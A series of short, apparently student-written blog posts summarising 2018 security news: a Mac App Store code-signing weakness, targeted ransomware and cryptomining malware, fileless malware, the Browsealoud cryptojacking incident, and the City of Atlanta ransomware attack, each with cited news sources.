An Overlooked Way of Getting Malware Onto Mac’s

By: John Schnaufer

This article was about malware targeted against Macs that can be hidden in the Mac app store. The writer of the article says that although they found the vulnerability, no one has used it yet from what they can see.

This attack could be used by bypassing the code signing done before submission to the app store. The code signature checks or code signing is basically virtual security checks, to make sure the app is safe and stable. It was noticed that the code only gets checked once, and then the signature doesn’t get checked again. This means that an attacker can make a clean app, submit it to the app store, and then once it gets downloads from users, release an update infected with malware for the users to download. They can also steal or buy real code signatures and put them into their malicious app and it has the possibility of getting published to the app store for everyone to download.

The writer of the main article says, “As a result of this research, Reed himself added code signature verification to Malwarebytes Mac products so they now perform a check every time they launch.” Reed works at the company Malwarebytes and he put out an update to their software to check the code signature again of updates to apps. He even says, “A script kiddie could pull off something like this.” This shows how something should be done to fix this problem before others catch on and start infecting peoples computers with malware. This was released recently, so hopefully, it gets fixed soon. I remember when I made my app for the app store and I do not ever remember any checks being done to my updates after the initial release.

 

Source:

https://www.wired.com/story/mac-malware-hide-code-signing/

 

Cryptocurrency mining malware, Ransomware, and who is at risk

By: Chase Alexander

9/11/2018

It is no secret that hackers are trying to gain something when they carry out an attack on a target, usually money. However the way that they do this can vary. It does not always mean that they are stealing credit card information, or bank account logins. Another way to exploit hacked targets is through cryptocurrency mining malware. There is also malware that takes over a system until a ransom is paid. Today I would like to look at three things. Ransomware, cryptocurrency mining malware, and who is at the greatest risk for these kinds of attacks.

First I am going to examine ransomware. This is an interesting case, as it has been around for quite some time now. The attack method dates all the way back to 2016. You would think that they would have been stopped by now, and you would be somewhat correct. Gone are the days of spreading ransomware through spam emails and outbreaks, where the philosophy was to cast a net as wide as possible and see what we catch. Today ransomware exists as a targeted attack on an individual or specific group. The goal of doing ransomware attacks this way is to carry out one strong attack, which will yield more reward then many weaker attacks. So how do they work? You gain entry into a system via weak Remote desktop protocol passwords. Escalate your privileges up to administrator. Use your new privileges to overcome security software. Spread your ransomware to encrypt files on the system. Finally leave a message with the ultimatum,” If you want your files to be decrypted, contact via email or dark web website.” And then you wait. If they pay the ransom, then mission success for the hacker. If they do not pay the ransom then it is almost inconsequential to the hacker. They will just move onto the next target and try again.

The other form of attack that is of interest is a cryptocurrency mining malware. What this attack does is take over a machine and use it to mine cryptocurrency for a hacker. This attack is very different because it requires no interaction between the hacker and the hacked. Unlike the previous method, this one allows the hacker to try and remain undetected. For ransomware, the hacked has the choice to either give up their machine and data, or give into the hacker. This method though gives no choice to the hacked. If they don’t hear their computer fan operating louder, then they will have no idea that they have been hacked. In addition to these facts, cryptocurrency is effectively an unregulated currency. This means that once the hacker has it, they are in the clear. If a hacker were to steal bank account credentials, there are still difficulties with actually attaining the currency inside of those bank accounts. A problem with this method however is that the profits are not immediate, they take time to incur. If ransomware is successful, then profits are made instantly.

So who is at risk for these attacks? Ransomware attacks are targeted attacks. They go after one group or individual. That group or individual will have to give up money in order to secure themselves. It is as simple as this; if you do not have money or credit, you are at a very low risk of this attack. The goal of ransomware is to get ransom. A hacker will go after someone who they know will be able to pay ransom. They are not going to go after the poor because they have very little to offer. A cryptomining attack however can happen to anybody. You don’t need any money or credit, if you have a computer it can be used for mining cryptocurrency. In terms of large targets we can look at Vietnam. Last year malware cost Vietnam 12.3 trillion VND or the equivalent of 540 million USD.

 

Sources:

  1. https://e.vnexpress.net/news/news/vietnam-vulnerable-as-new-cyber-security-threat-emerges-3804240.html
  2. https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
  3. https://www.zdnet.com/article/cryptocurrency-mining-malware-why-it-is-such-a-menace-and-where-its-going-next/

The Rise of Fileless malware

Over the last two years, there has been an uptick in the amount the malware attacks that are fileless. This means that the malware is designed to not rely on or interacts with the filesystem of the host machine. This is so it is relatively undetectable by file scanning, which is the common way to find malware. This rising trend will change how we deal with these kind of malware threats. One of the changes to combat this threat is to turn to behavior based detection strategies like “script block logging,” which will keep track of code that is executed, for someone to sift through and look for abnormalities.

Experts are predicting that fileless malware attacks will continue to rise as it did from 2016 to 2017 because of its success rate. Fileless attacks are more likely to be successful than file-based attacks by an order of magnitude (literally 10 times more likely), according to the 2017 “State of Endpoint Security Risk” report from Ponemon. The ratio of fileless to file-based attacks grew in 2017 and is forecasted to continue to do grow this year. This goes to show that we need to constantly be adapting to different threats, because we know the hackers will.
– Ryne Krueger

 

https://www.technewsworld.com/story/85178.html

 

Crypto-jacking on Government Official Websites.

About a month ago it was discovered that there was a vulnerability being exploited on a browser plug-in called, Browsealoud. Browsealoud is a website plugin, developed by the company TextHelp, that adds speech, reading, and translation to websites, in an effort  to help those with dyslexia and other conditions.  Hackers injected a crypto-mining script on a Java file within the Browsealoud library. The script would mine the currency ‘monero’. Since the hackers attacked Browsealoud itself and not the individual websites, all the websites that were using Browsealoud (nearly 4000) were infected.  Some of the websites included  UK’s ICO (Information Commissioner’s Office) and NHS (National Health Service) and US’ federal judiciary. When someone visited a website using the plugin, the script would run and use the visitors CPU to begin mining.

Crytpo-mining is something to be wary about especially with the rise of Bitcoin and other cryptocurrencies. The hackers simply just wanted an easy way to mine more currency for themselves whether or not it was legally. There reason for doing this comes back to the acronym ‘MEECES’ which stands for money, ego, entertainment, cause, entrance, status. The attackers were just looking for some money in this case because as of now it is unknown who injected the script. It was very fortunate, with the information as of now, that no information of the users who used the website was stolen, and only were used to mine cryptocurrency.

Websites now should use more caution when implementing plugins to there website. Every company should have people testing for vulnerabilities within their services and should submit proof of this to their customers. In the future we need to become more aware of ways our websites and services can become vulnerable and the risks we take using them.

– Jordan Disciglio

Souces:
https://viraldocks.com/cryptojacking-attack-hits-4000-websites/

https://www.theguardian.com/technology/2018/feb/12/cryptojacking-attack-hits-australian-government-websites

City of Atlanta Victim of yet Another Cyber Attack

Early on March 22nd, several departments in Atlanta, Georgia were the target for a cyber attack. The attackers launched a ransomware attack, and demanded bitcoins as payment (over $50,000 USD).

Ransomware exampleRansomware attacks are relatively new and became popular in 2017 with the widely feared WannaCry attack. Ransomware typically encrypts some of your files and locks you out of your computer, then demands a ransom to be paid (usually with Bitcoin, an anonymous cryptocurrency).

This attack had a widespread impact as it affected multiple departments in Atlanta. Administrators took down several websites and services while the attack was investigated by the FBI, DHS, Microsoft, and Cisco. While ATL airport was not directly affected, administrators also disabled its Wi-Fi and advised passengers that flight schedules may not be accurate and to verify information with their airline.

As an additional measure, city employees were directed not to turn on any devices in the building until the malware had been contained. Five days later on March 27th the first machines were powered back on. Administrators expect some machines to be infected and that employees will continue to work using other methods if their machines are affected.

Ransomware attacks historically have just been a means of pressuring victims into paying the ransom. Attackers usually are not looking to steal information in the process. In fact, if an attacker did want to steal information, it wouldn’t make much sense to tell the victim that their machine is infected. However, in the case of the Atlanta cyber attack, both employees and the public were advised to monitor their credit cards and bank accounts for any suspicious activity.

The investigation has shown that it doesn’t appear any information has been compromised. While the details of the attack have not been released, Rendition Infosec reported that Atlanta government had been compromised by a previous cyber attack in April 2017. Microsoft had released critical patches over a month before the attack happened, but they were not installed. The attack lasted a little over a week, and statements from the city of Atlanta suggest that they were not aware the attack had happened in the first place. The identity of the attackers still remains unknown.


Jesse Roux

http://amp.wsbtv.com/www.wsbtv.com/news/local/atlanta/fbi-looking-into-citywide-computer-issues-in-atlanta/720045695?tnym

http://amp.wsbtv.com/www.wsbtv.com/www.wsbtv.com/news/local/hartsfield-jackson-takes-down-wi-fi-after-cyber-attack-on-city/720533019

http://searchsecurity.techtarget.com/news/252437715/Five-days-after-Atlanta-ransomware-attack-recovery-begins

https://www.renditioninfosec.com/2018/03/atlanta-government-was-compromised-in-april-2017-well-before-last-weeks-ransomware-attack/